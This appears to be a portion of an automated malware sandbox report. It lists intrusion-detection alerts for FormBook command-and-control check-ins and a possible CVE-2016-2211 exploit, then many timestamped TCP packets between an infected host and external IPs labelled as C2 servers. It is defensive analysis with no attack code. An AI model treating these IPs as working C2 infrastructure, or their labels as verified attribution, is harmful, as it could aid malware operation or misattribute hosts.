2024-07-27T08:07:42.405050+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	62413	80	192.168.2.6	188.95.113.62
2024-07-27T08:08:15.578235+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	62423	80	192.168.2.6	84.32.84.178
2024-07-27T08:06:35.062277+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	62393	80	192.168.2.6	203.161.50.128
2024-07-27T08:07:56.731704+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	62417	80	192.168.2.6	202.52.146.180
2024-07-27T08:06:09.129176+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	62386	80	192.168.2.6	188.114.97.3
2024-07-27T08:08:23.690331+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	62425	80	192.168.2.6	3.33.130.190
2024-07-27T08:06:48.990421+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	62397	80	192.168.2.6	51.89.93.192
2024-07-27T08:07:31.648284+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	62410	80	192.168.2.6	35.241.41.54
2024-07-27T08:07:44.701292+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	62414	80	192.168.2.6	188.95.113.62
2024-07-27T08:06:37.637614+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	62394	80	192.168.2.6	203.161.50.128
2024-07-27T08:07:04.642474+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	62402	80	192.168.2.6	3.33.130.190
2024-07-27T08:07:02.066672+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	62401	80	192.168.2.6	3.33.130.190
2024-07-27T08:06:06.559034+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	62385	80	192.168.2.6	188.114.97.3
2024-07-27T08:06:23.619790+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	62390	80	192.168.2.6	157.7.107.37
2024-07-27T08:06:51.342530+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	62398	80	192.168.2.6	51.89.93.192
2024-07-27T08:04:49.396756+0200	TCP	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	62428	80	192.168.2.6	3.33.130.190
2024-07-27T08:08:50.381657+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	62433	80	192.168.2.6	162.241.216.26
2024-07-27T08:08:37.190433+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	62429	80	192.168.2.6	172.191.244.62
2024-07-27T08:06:40.286504+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	62395	80	192.168.2.6	203.161.50.128
2024-07-27T08:08:26.323993+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	62426	80	192.168.2.6	3.33.130.190
2024-07-27T08:06:42.961641+0200	TCP	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	62396	80	192.168.2.6	203.161.50.128
2024-07-27T08:06:53.908398+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	62399	80	192.168.2.6	51.89.93.192
2024-07-27T08:08:18.124683+0200	TCP	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	62424	80	192.168.2.6	84.32.84.178
2024-07-27T08:07:36.207112+0200	TCP	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	62412	80	192.168.2.6	35.241.41.54
2024-07-27T08:07:50.079011+0200	TCP	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	62416	80	192.168.2.6	188.95.113.62
2024-07-27T08:07:09.792982+0200	TCP	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	62404	80	192.168.2.6	3.33.130.190
2024-07-27T08:05:32.670368+0200	TCP	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	443	62382	52.165.165.26	192.168.2.6
2024-07-27T08:08:13.006229+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	62422	80	192.168.2.6	84.32.84.178
2024-07-27T08:08:04.678044+0200	TCP	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	62420	80	192.168.2.6	202.52.146.180
2024-07-27T08:08:52.946588+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	62434	80	192.168.2.6	162.241.216.26
2024-07-27T08:06:14.361932+0200	TCP	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	62388	80	192.168.2.6	188.114.97.3
2024-07-27T08:07:28.510447+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	62409	80	192.168.2.6	35.241.41.54
2024-07-27T08:07:07.210427+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	62403	80	192.168.2.6	3.33.130.190
2024-07-27T08:05:11.068176+0200	TCP	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	443	49706	13.85.23.86	192.168.2.6
2024-07-27T08:06:56.482623+0200	TCP	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	62400	80	192.168.2.6	51.89.93.192
2024-07-27T08:08:42.335266+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	62431	80	192.168.2.6	172.191.244.62
2024-07-27T08:08:59.240517+0200	TCP	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	62436	80	192.168.2.6	162.241.216.26
2024-07-27T08:05:45.825566+0200	TCP	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	62384	80	192.168.2.6	95.169.27.235
2024-07-27T08:07:15.349236+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	62405	80	192.168.2.6	3.33.130.190
2024-07-27T08:07:33.636052+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	62411	80	192.168.2.6	35.241.41.54
2024-07-27T08:06:21.036129+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	62389	80	192.168.2.6	157.7.107.37
2024-07-27T08:07:47.510339+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	62415	80	192.168.2.6	188.95.113.62
2024-07-27T08:06:11.703721+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	62387	80	192.168.2.6	188.114.97.3
2024-07-27T08:06:26.212321+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	62391	80	192.168.2.6	157.7.107.37
2024-07-27T08:08:02.214540+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	62419	80	192.168.2.6	202.52.146.180
2024-07-27T08:05:34.708798+0200	TCP	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	443	62383	52.165.165.26	192.168.2.6

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 27, 2024 08:05:44.625844955 CEST	62384	80	192.168.2.6	95.169.27.235
Jul 27, 2024 08:05:44.630800009 CEST	80	62384	95.169.27.235	192.168.2.6
Jul 27, 2024 08:05:44.630872011 CEST	62384	80	192.168.2.6	95.169.27.235
Jul 27, 2024 08:05:44.658690929 CEST	62384	80	192.168.2.6	95.169.27.235
Jul 27, 2024 08:05:44.663503885 CEST	80	62384	95.169.27.235	192.168.2.6
Jul 27, 2024 08:05:45.825368881 CEST	80	62384	95.169.27.235	192.168.2.6
Jul 27, 2024 08:05:45.825521946 CEST	80	62384	95.169.27.235	192.168.2.6
Jul 27, 2024 08:05:45.825566053 CEST	62384	80	192.168.2.6	95.169.27.235
Jul 27, 2024 08:05:45.833776951 CEST	62384	80	192.168.2.6	95.169.27.235
Jul 27, 2024 08:05:45.838614941 CEST	80	62384	95.169.27.235	192.168.2.6
Jul 27, 2024 08:06:05.925782919 CEST	62385	80	192.168.2.6	188.114.97.3
Jul 27, 2024 08:06:05.930613995 CEST	80	62385	188.114.97.3	192.168.2.6
Jul 27, 2024 08:06:05.930685043 CEST	62385	80	192.168.2.6	188.114.97.3
Jul 27, 2024 08:06:05.948867083 CEST	62385	80	192.168.2.6	188.114.97.3
Jul 27, 2024 08:06:05.953958035 CEST	80	62385	188.114.97.3	192.168.2.6
Jul 27, 2024 08:06:06.558952093 CEST	80	62385	188.114.97.3	192.168.2.6
Jul 27, 2024 08:06:06.558969975 CEST	80	62385	188.114.97.3	192.168.2.6
Jul 27, 2024 08:06:06.559034109 CEST	62385	80	192.168.2.6	188.114.97.3
Jul 27, 2024 08:06:07.460859060 CEST	62385	80	192.168.2.6	188.114.97.3
Jul 27, 2024 08:06:08.493264914 CEST	62386	80	192.168.2.6	188.114.97.3
Jul 27, 2024 08:06:08.498231888 CEST	80	62386	188.114.97.3	192.168.2.6
Jul 27, 2024 08:06:08.498301029 CEST	62386	80	192.168.2.6	188.114.97.3
Jul 27, 2024 08:06:08.517040968 CEST	62386	80	192.168.2.6	188.114.97.3
Jul 27, 2024 08:06:08.521908045 CEST	80	62386	188.114.97.3	192.168.2.6
Jul 27, 2024 08:06:09.128319979 CEST	80	62386	188.114.97.3	192.168.2.6
Jul 27, 2024 08:06:09.129122972 CEST	80	62386	188.114.97.3	192.168.2.6
Jul 27, 2024 08:06:09.129175901 CEST	62386	80	192.168.2.6	188.114.97.3
Jul 27, 2024 08:06:10.024271011 CEST	62386	80	192.168.2.6	188.114.97.3
Jul 27, 2024 08:06:11.061260939 CEST	62387	80	192.168.2.6	188.114.97.3
Jul 27, 2024 08:06:11.067394018 CEST	80	62387	188.114.97.3	192.168.2.6
Jul 27, 2024 08:06:11.067522049 CEST	62387	80	192.168.2.6	188.114.97.3
Jul 27, 2024 08:06:11.093704939 CEST	62387	80	192.168.2.6	188.114.97.3
Jul 27, 2024 08:06:11.098660946 CEST	80	62387	188.114.97.3	192.168.2.6
Jul 27, 2024 08:06:11.098794937 CEST	80	62387	188.114.97.3	192.168.2.6
Jul 27, 2024 08:06:11.703470945 CEST	80	62387	188.114.97.3	192.168.2.6
Jul 27, 2024 08:06:11.703493118 CEST	80	62387	188.114.97.3	192.168.2.6
Jul 27, 2024 08:06:11.703721046 CEST	62387	80	192.168.2.6	188.114.97.3
Jul 27, 2024 08:06:12.602590084 CEST	62387	80	192.168.2.6	188.114.97.3
Jul 27, 2024 08:06:13.686336994 CEST	62388	80	192.168.2.6	188.114.97.3
Jul 27, 2024 08:06:13.691709995 CEST	80	62388	188.114.97.3	192.168.2.6
Jul 27, 2024 08:06:13.691809893 CEST	62388	80	192.168.2.6	188.114.97.3
Jul 27, 2024 08:06:13.731338978 CEST	62388	80	192.168.2.6	188.114.97.3
Jul 27, 2024 08:06:13.746057987 CEST	80	62388	188.114.97.3	192.168.2.6
Jul 27, 2024 08:06:14.361712933 CEST	80	62388	188.114.97.3	192.168.2.6
Jul 27, 2024 08:06:14.361804962 CEST	80	62388	188.114.97.3	192.168.2.6
Jul 27, 2024 08:06:14.361932039 CEST	62388	80	192.168.2.6	188.114.97.3
Jul 27, 2024 08:06:14.371092081 CEST	62388	80	192.168.2.6	188.114.97.3
Jul 27, 2024 08:06:14.377881050 CEST	80	62388	188.114.97.3	192.168.2.6
Jul 27, 2024 08:06:20.215234995 CEST	62389	80	192.168.2.6	157.7.107.37
Jul 27, 2024 08:06:20.220132113 CEST	80	62389	157.7.107.37	192.168.2.6
Jul 27, 2024 08:06:20.220285892 CEST	62389	80	192.168.2.6	157.7.107.37
Jul 27, 2024 08:06:20.255100965 CEST	62389	80	192.168.2.6	157.7.107.37
Jul 27, 2024 08:06:20.259988070 CEST	80	62389	157.7.107.37	192.168.2.6
Jul 27, 2024 08:06:21.035975933 CEST	80	62389	157.7.107.37	192.168.2.6
Jul 27, 2024 08:06:21.036005020 CEST	80	62389	157.7.107.37	192.168.2.6
Jul 27, 2024 08:06:21.036020994 CEST	80	62389	157.7.107.37	192.168.2.6
Jul 27, 2024 08:06:21.036036968 CEST	80	62389	157.7.107.37	192.168.2.6
Jul 27, 2024 08:06:21.036055088 CEST	80	62389	157.7.107.37	192.168.2.6
Jul 27, 2024 08:06:21.036068916 CEST	80	62389	157.7.107.37	192.168.2.6
Jul 27, 2024 08:06:21.036084890 CEST	80	62389	157.7.107.37	192.168.2.6
Jul 27, 2024 08:06:21.036102057 CEST	80	62389	157.7.107.37	192.168.2.6
Jul 27, 2024 08:06:21.036115885 CEST	80	62389	157.7.107.37	192.168.2.6
Jul 27, 2024 08:06:21.036134005 CEST	80	62389	157.7.107.37	192.168.2.6
Jul 27, 2024 08:06:21.036128998 CEST	62389	80	192.168.2.6	157.7.107.37
Jul 27, 2024 08:06:21.036225080 CEST	62389	80	192.168.2.6	157.7.107.37
Jul 27, 2024 08:06:21.036226034 CEST	62389	80	192.168.2.6	157.7.107.37
Jul 27, 2024 08:06:21.036226034 CEST	62389	80	192.168.2.6	157.7.107.37
Jul 27, 2024 08:06:21.041207075 CEST	80	62389	157.7.107.37	192.168.2.6
Jul 27, 2024 08:06:21.041270971 CEST	80	62389	157.7.107.37	192.168.2.6
Jul 27, 2024 08:06:21.041289091 CEST	80	62389	157.7.107.37	192.168.2.6
Jul 27, 2024 08:06:21.041362047 CEST	62389	80	192.168.2.6	157.7.107.37
Jul 27, 2024 08:06:21.203593016 CEST	80	62389	157.7.107.37	192.168.2.6
Jul 27, 2024 08:06:21.203618050 CEST	80	62389	157.7.107.37	192.168.2.6
Jul 27, 2024 08:06:21.203634977 CEST	80	62389	157.7.107.37	192.168.2.6
Jul 27, 2024 08:06:21.203651905 CEST	80	62389	157.7.107.37	192.168.2.6
Jul 27, 2024 08:06:21.203674078 CEST	80	62389	157.7.107.37	192.168.2.6
Jul 27, 2024 08:06:21.203722954 CEST	62389	80	192.168.2.6	157.7.107.37
Jul 27, 2024 08:06:21.203771114 CEST	62389	80	192.168.2.6	157.7.107.37
Jul 27, 2024 08:06:21.775799990 CEST	62389	80	192.168.2.6	157.7.107.37
Jul 27, 2024 08:06:22.821341991 CEST	62390	80	192.168.2.6	157.7.107.37
Jul 27, 2024 08:06:22.828207016 CEST	80	62390	157.7.107.37	192.168.2.6
Jul 27, 2024 08:06:22.828351974 CEST	62390	80	192.168.2.6	157.7.107.37
Jul 27, 2024 08:06:22.857825041 CEST	62390	80	192.168.2.6	157.7.107.37
Jul 27, 2024 08:06:22.866328001 CEST	80	62390	157.7.107.37	192.168.2.6
Jul 27, 2024 08:06:23.619672060 CEST	80	62390	157.7.107.37	192.168.2.6
Jul 27, 2024 08:06:23.619704962 CEST	80	62390	157.7.107.37	192.168.2.6
Jul 27, 2024 08:06:23.619720936 CEST	80	62390	157.7.107.37	192.168.2.6
Jul 27, 2024 08:06:23.619740963 CEST	80	62390	157.7.107.37	192.168.2.6
Jul 27, 2024 08:06:23.619756937 CEST	80	62390	157.7.107.37	192.168.2.6
Jul 27, 2024 08:06:23.619777918 CEST	80	62390	157.7.107.37	192.168.2.6
Jul 27, 2024 08:06:23.619793892 CEST	80	62390	157.7.107.37	192.168.2.6
Jul 27, 2024 08:06:23.619790077 CEST	62390	80	192.168.2.6	157.7.107.37
Jul 27, 2024 08:06:23.619791031 CEST	62390	80	192.168.2.6	157.7.107.37
Jul 27, 2024 08:06:23.619811058 CEST	80	62390	157.7.107.37	192.168.2.6
Jul 27, 2024 08:06:23.619827032 CEST	80	62390	157.7.107.37	192.168.2.6
Jul 27, 2024 08:06:23.619843960 CEST	80	62390	157.7.107.37	192.168.2.6
Jul 27, 2024 08:06:23.619864941 CEST	62390	80	192.168.2.6	157.7.107.37
Jul 27, 2024 08:06:23.619864941 CEST	62390	80	192.168.2.6	157.7.107.37
Jul 27, 2024 08:06:23.619911909 CEST	62390	80	192.168.2.6	157.7.107.37
Jul 27, 2024 08:06:23.624742031 CEST	80	62390	157.7.107.37	192.168.2.6
Jul 27, 2024 08:06:23.624808073 CEST	80	62390	157.7.107.37	192.168.2.6
Jul 27, 2024 08:06:23.624869108 CEST	62390	80	192.168.2.6	157.7.107.37
Jul 27, 2024 08:06:23.708012104 CEST	80	62390	157.7.107.37	192.168.2.6
Jul 27, 2024 08:06:23.756133080 CEST	62390	80	192.168.2.6	157.7.107.37
Jul 27, 2024 08:06:23.787643909 CEST	80	62390	157.7.107.37	192.168.2.6
Jul 27, 2024 08:06:23.787667990 CEST	80	62390	157.7.107.37	192.168.2.6
Jul 27, 2024 08:06:23.787687063 CEST	80	62390	157.7.107.37	192.168.2.6
Jul 27, 2024 08:06:23.787703037 CEST	80	62390	157.7.107.37	192.168.2.6
Jul 27, 2024 08:06:23.787784100 CEST	62390	80	192.168.2.6	157.7.107.37
Jul 27, 2024 08:06:23.787870884 CEST	62390	80	192.168.2.6	157.7.107.37
Jul 27, 2024 08:06:23.788122892 CEST	80	62390	157.7.107.37	192.168.2.6
Jul 27, 2024 08:06:23.788193941 CEST	62390	80	192.168.2.6	157.7.107.37
Jul 27, 2024 08:06:24.368124008 CEST	62390	80	192.168.2.6	157.7.107.37
Jul 27, 2024 08:06:25.407753944 CEST	62391	80	192.168.2.6	157.7.107.37
Jul 27, 2024 08:06:25.412916899 CEST	80	62391	157.7.107.37	192.168.2.6
Jul 27, 2024 08:06:25.413173914 CEST	62391	80	192.168.2.6	157.7.107.37
Jul 27, 2024 08:06:25.431649923 CEST	62391	80	192.168.2.6	157.7.107.37
Jul 27, 2024 08:06:25.439498901 CEST	80	62391	157.7.107.37	192.168.2.6
Jul 27, 2024 08:06:25.439652920 CEST	80	62391	157.7.107.37	192.168.2.6
Jul 27, 2024 08:06:26.212132931 CEST	80	62391	157.7.107.37	192.168.2.6
Jul 27, 2024 08:06:26.212173939 CEST	80	62391	157.7.107.37	192.168.2.6
Jul 27, 2024 08:06:26.212198019 CEST	80	62391	157.7.107.37	192.168.2.6
Jul 27, 2024 08:06:26.212219954 CEST	80	62391	157.7.107.37	192.168.2.6
Jul 27, 2024 08:06:26.212235928 CEST	80	62391	157.7.107.37	192.168.2.6
Jul 27, 2024 08:06:26.212249041 CEST	80	62391	157.7.107.37	192.168.2.6
Jul 27, 2024 08:06:26.212258101 CEST	80	62391	157.7.107.37	192.168.2.6
Jul 27, 2024 08:06:26.212272882 CEST	80	62391	157.7.107.37	192.168.2.6
Jul 27, 2024 08:06:26.212286949 CEST	80	62391	157.7.107.37	192.168.2.6
Jul 27, 2024 08:06:26.212301970 CEST	80	62391	157.7.107.37	192.168.2.6
Jul 27, 2024 08:06:26.212321043 CEST	62391	80	192.168.2.6	157.7.107.37
Jul 27, 2024 08:06:26.212455034 CEST	62391	80	192.168.2.6	157.7.107.37
Jul 27, 2024 08:06:26.217238903 CEST	80	62391	157.7.107.37	192.168.2.6
Jul 27, 2024 08:06:26.217262983 CEST	80	62391	157.7.107.37	192.168.2.6
Jul 27, 2024 08:06:26.217339993 CEST	62391	80	192.168.2.6	157.7.107.37
Jul 27, 2024 08:06:26.382213116 CEST	80	62391	157.7.107.37	192.168.2.6
Jul 27, 2024 08:06:26.382251024 CEST	80	62391	157.7.107.37	192.168.2.6
Jul 27, 2024 08:06:26.382266045 CEST	80	62391	157.7.107.37	192.168.2.6
Jul 27, 2024 08:06:26.382335901 CEST	80	62391	157.7.107.37	192.168.2.6
Jul 27, 2024 08:06:26.382344007 CEST	62391	80	192.168.2.6	157.7.107.37
Jul 27, 2024 08:06:26.382350922 CEST	80	62391	157.7.107.37	192.168.2.6
Jul 27, 2024 08:06:26.382366896 CEST	80	62391	157.7.107.37	192.168.2.6
Jul 27, 2024 08:06:26.382392883 CEST	62391	80	192.168.2.6	157.7.107.37
Jul 27, 2024 08:06:26.382437944 CEST	62391	80	192.168.2.6	157.7.107.37
Jul 27, 2024 08:06:26.383147001 CEST	80	62391	157.7.107.37	192.168.2.6
Jul 27, 2024 08:06:26.383352041 CEST	80	62391	157.7.107.37	192.168.2.6
Jul 27, 2024 08:06:26.383404016 CEST	62391	80	192.168.2.6	157.7.107.37
Jul 27, 2024 08:06:26.947026014 CEST	62391	80	192.168.2.6	157.7.107.37
Jul 27, 2024 08:06:27.982912064 CEST	62392	80	192.168.2.6	157.7.107.37
Jul 27, 2024 08:06:27.987976074 CEST	80	62392	157.7.107.37	192.168.2.6
Jul 27, 2024 08:06:27.988131046 CEST	62392	80	192.168.2.6	157.7.107.37
Jul 27, 2024 08:06:28.004748106 CEST	62392	80	192.168.2.6	157.7.107.37
Jul 27, 2024 08:06:28.009545088 CEST	80	62392	157.7.107.37	192.168.2.6
Jul 27, 2024 08:06:28.803503990 CEST	80	62392	157.7.107.37	192.168.2.6
Jul 27, 2024 08:06:28.803524017 CEST	80	62392	157.7.107.37	192.168.2.6
Jul 27, 2024 08:06:28.803554058 CEST	80	62392	157.7.107.37	192.168.2.6
Jul 27, 2024 08:06:28.803566933 CEST	80	62392	157.7.107.37	192.168.2.6
Jul 27, 2024 08:06:28.803579092 CEST	80	62392	157.7.107.37	192.168.2.6
Jul 27, 2024 08:06:28.803591013 CEST	80	62392	157.7.107.37	192.168.2.6
Jul 27, 2024 08:06:28.803602934 CEST	80	62392	157.7.107.37	192.168.2.6
Jul 27, 2024 08:06:28.803615093 CEST	80	62392	157.7.107.37	192.168.2.6
Jul 27, 2024 08:06:28.803627014 CEST	80	62392	157.7.107.37	192.168.2.6
Jul 27, 2024 08:06:28.803638935 CEST	80	62392	157.7.107.37	192.168.2.6
Jul 27, 2024 08:06:28.803781033 CEST	62392	80	192.168.2.6	157.7.107.37
Jul 27, 2024 08:06:28.803865910 CEST	62392	80	192.168.2.6	157.7.107.37
Jul 27, 2024 08:06:28.810015917 CEST	80	62392	157.7.107.37	192.168.2.6
Jul 27, 2024 08:06:28.810215950 CEST	80	62392	157.7.107.37	192.168.2.6
Jul 27, 2024 08:06:28.810292006 CEST	62392	80	192.168.2.6	157.7.107.37
Jul 27, 2024 08:06:28.969683886 CEST	80	62392	157.7.107.37	192.168.2.6
Jul 27, 2024 08:06:28.969703913 CEST	80	62392	157.7.107.37	192.168.2.6
Jul 27, 2024 08:06:28.969715118 CEST	80	62392	157.7.107.37	192.168.2.6
Jul 27, 2024 08:06:28.969723940 CEST	80	62392	157.7.107.37	192.168.2.6
Jul 27, 2024 08:06:28.969734907 CEST	80	62392	157.7.107.37	192.168.2.6
Jul 27, 2024 08:06:28.969856024 CEST	62392	80	192.168.2.6	157.7.107.37
Jul 27, 2024 08:06:28.970041037 CEST	80	62392	157.7.107.37	192.168.2.6
Jul 27, 2024 08:06:28.970151901 CEST	62392	80	192.168.2.6	157.7.107.37
Jul 27, 2024 08:06:28.970237970 CEST	80	62392	157.7.107.37	192.168.2.6
Jul 27, 2024 08:06:28.970314026 CEST	62392	80	192.168.2.6	157.7.107.37
Jul 27, 2024 08:06:28.983603001 CEST	62392	80	192.168.2.6	157.7.107.37
Jul 27, 2024 08:06:28.988655090 CEST	80	62392	157.7.107.37	192.168.2.6
Jul 27, 2024 08:06:34.448005915 CEST	62393	80	192.168.2.6	203.161.50.128
Jul 27, 2024 08:06:34.457633018 CEST	80	62393	203.161.50.128	192.168.2.6
Jul 27, 2024 08:06:34.457699060 CEST	62393	80	192.168.2.6	203.161.50.128
Jul 27, 2024 08:06:34.488842010 CEST	62393	80	192.168.2.6	203.161.50.128
Jul 27, 2024 08:06:34.493922949 CEST	80	62393	203.161.50.128	192.168.2.6
Jul 27, 2024 08:06:35.062210083 CEST	80	62393	203.161.50.128	192.168.2.6
Jul 27, 2024 08:06:35.062223911 CEST	80	62393	203.161.50.128	192.168.2.6
Jul 27, 2024 08:06:35.062241077 CEST	80	62393	203.161.50.128	192.168.2.6
Jul 27, 2024 08:06:35.062259912 CEST	80	62393	203.161.50.128	192.168.2.6
Jul 27, 2024 08:06:35.062269926 CEST	80	62393	203.161.50.128	192.168.2.6
Jul 27, 2024 08:06:35.062277079 CEST	62393	80	192.168.2.6	203.161.50.128
Jul 27, 2024 08:06:35.062283039 CEST	80	62393	203.161.50.128	192.168.2.6
Jul 27, 2024 08:06:35.062295914 CEST	80	62393	203.161.50.128	192.168.2.6
Jul 27, 2024 08:06:35.062306881 CEST	80	62393	203.161.50.128	192.168.2.6
Jul 27, 2024 08:06:35.062313080 CEST	62393	80	192.168.2.6	203.161.50.128
Jul 27, 2024 08:06:35.062318087 CEST	80	62393	203.161.50.128	192.168.2.6
Jul 27, 2024 08:06:35.062329054 CEST	80	62393	203.161.50.128	192.168.2.6
Jul 27, 2024 08:06:35.062340975 CEST	80	62393	203.161.50.128	192.168.2.6
Jul 27, 2024 08:06:35.062342882 CEST	62393	80	192.168.2.6	203.161.50.128
Jul 27, 2024 08:06:35.062371016 CEST	62393	80	192.168.2.6	203.161.50.128
Jul 27, 2024 08:06:35.062397003 CEST	62393	80	192.168.2.6	203.161.50.128
Jul 27, 2024 08:06:35.993132114 CEST	62393	80	192.168.2.6	203.161.50.128
Jul 27, 2024 08:06:37.037609100 CEST	62394	80	192.168.2.6	203.161.50.128
Jul 27, 2024 08:06:37.042733908 CEST	80	62394	203.161.50.128	192.168.2.6
Jul 27, 2024 08:06:37.042834044 CEST	62394	80	192.168.2.6	203.161.50.128
Jul 27, 2024 08:06:37.063756943 CEST	62394	80	192.168.2.6	203.161.50.128
Jul 27, 2024 08:06:37.068644047 CEST	80	62394	203.161.50.128	192.168.2.6
Jul 27, 2024 08:06:37.637489080 CEST	80	62394	203.161.50.128	192.168.2.6
Jul 27, 2024 08:06:37.637566090 CEST	80	62394	203.161.50.128	192.168.2.6
Jul 27, 2024 08:06:37.637592077 CEST	80	62394	203.161.50.128	192.168.2.6
Jul 27, 2024 08:06:37.637604952 CEST	80	62394	203.161.50.128	192.168.2.6
Jul 27, 2024 08:06:37.637614012 CEST	62394	80	192.168.2.6	203.161.50.128
Jul 27, 2024 08:06:37.637628078 CEST	80	62394	203.161.50.128	192.168.2.6
Jul 27, 2024 08:06:37.637646914 CEST	62394	80	192.168.2.6	203.161.50.128
Jul 27, 2024 08:06:37.637646914 CEST	80	62394	203.161.50.128	192.168.2.6
Jul 27, 2024 08:06:37.637679100 CEST	80	62394	203.161.50.128	192.168.2.6
Jul 27, 2024 08:06:37.637690067 CEST	80	62394	203.161.50.128	192.168.2.6
Jul 27, 2024 08:06:37.637691975 CEST	62394	80	192.168.2.6	203.161.50.128
Jul 27, 2024 08:06:37.637701988 CEST	80	62394	203.161.50.128	192.168.2.6
Jul 27, 2024 08:06:37.637712955 CEST	80	62394	203.161.50.128	192.168.2.6
Jul 27, 2024 08:06:37.637727976 CEST	62394	80	192.168.2.6	203.161.50.128
Jul 27, 2024 08:06:37.637749910 CEST	62394	80	192.168.2.6	203.161.50.128
Jul 27, 2024 08:06:37.638120890 CEST	80	62394	203.161.50.128	192.168.2.6
Jul 27, 2024 08:06:37.638171911 CEST	62394	80	192.168.2.6	203.161.50.128
Jul 27, 2024 08:06:38.570152044 CEST	62394	80	192.168.2.6	203.161.50.128
Jul 27, 2024 08:06:39.607883930 CEST	62395	80	192.168.2.6	203.161.50.128
Jul 27, 2024 08:06:39.669847012 CEST	80	62395	203.161.50.128	192.168.2.6
Jul 27, 2024 08:06:39.669924974 CEST	62395	80	192.168.2.6	203.161.50.128
Jul 27, 2024 08:06:39.698824883 CEST	62395	80	192.168.2.6	203.161.50.128
Jul 27, 2024 08:06:39.705064058 CEST	80	62395	203.161.50.128	192.168.2.6
Jul 27, 2024 08:06:39.705074072 CEST	80	62395	203.161.50.128	192.168.2.6
Jul 27, 2024 08:06:40.286413908 CEST	80	62395	203.161.50.128	192.168.2.6
Jul 27, 2024 08:06:40.286432981 CEST	80	62395	203.161.50.128	192.168.2.6
Jul 27, 2024 08:06:40.286446095 CEST	80	62395	203.161.50.128	192.168.2.6
Jul 27, 2024 08:06:40.286457062 CEST	80	62395	203.161.50.128	192.168.2.6
Jul 27, 2024 08:06:40.286469936 CEST	80	62395	203.161.50.128	192.168.2.6
Jul 27, 2024 08:06:40.286480904 CEST	80	62395	203.161.50.128	192.168.2.6
Jul 27, 2024 08:06:40.286494970 CEST	80	62395	203.161.50.128	192.168.2.6
Jul 27, 2024 08:06:40.286504984 CEST	80	62395	203.161.50.128	192.168.2.6
Jul 27, 2024 08:06:40.286504030 CEST	62395	80	192.168.2.6	203.161.50.128
Jul 27, 2024 08:06:40.286504030 CEST	62395	80	192.168.2.6	203.161.50.128
Jul 27, 2024 08:06:40.286576986 CEST	62395	80	192.168.2.6	203.161.50.128
Jul 27, 2024 08:06:40.286576986 CEST	62395	80	192.168.2.6	203.161.50.128
Jul 27, 2024 08:06:40.286777020 CEST	80	62395	203.161.50.128	192.168.2.6
Jul 27, 2024 08:06:40.286884069 CEST	80	62395	203.161.50.128	192.168.2.6
Jul 27, 2024 08:06:40.286927938 CEST	62395	80	192.168.2.6	203.161.50.128
Jul 27, 2024 08:06:40.287015915 CEST	80	62395	203.161.50.128	192.168.2.6
Jul 27, 2024 08:06:40.287060976 CEST	62395	80	192.168.2.6	203.161.50.128
Jul 27, 2024 08:06:41.210947990 CEST	62395	80	192.168.2.6	203.161.50.128
Jul 27, 2024 08:06:42.338392973 CEST	62396	80	192.168.2.6	203.161.50.128
Jul 27, 2024 08:06:42.343322039 CEST	80	62396	203.161.50.128	192.168.2.6
Jul 27, 2024 08:06:42.343444109 CEST	62396	80	192.168.2.6	203.161.50.128
Jul 27, 2024 08:06:42.362745047 CEST	62396	80	192.168.2.6	203.161.50.128
Jul 27, 2024 08:06:42.367508888 CEST	80	62396	203.161.50.128	192.168.2.6
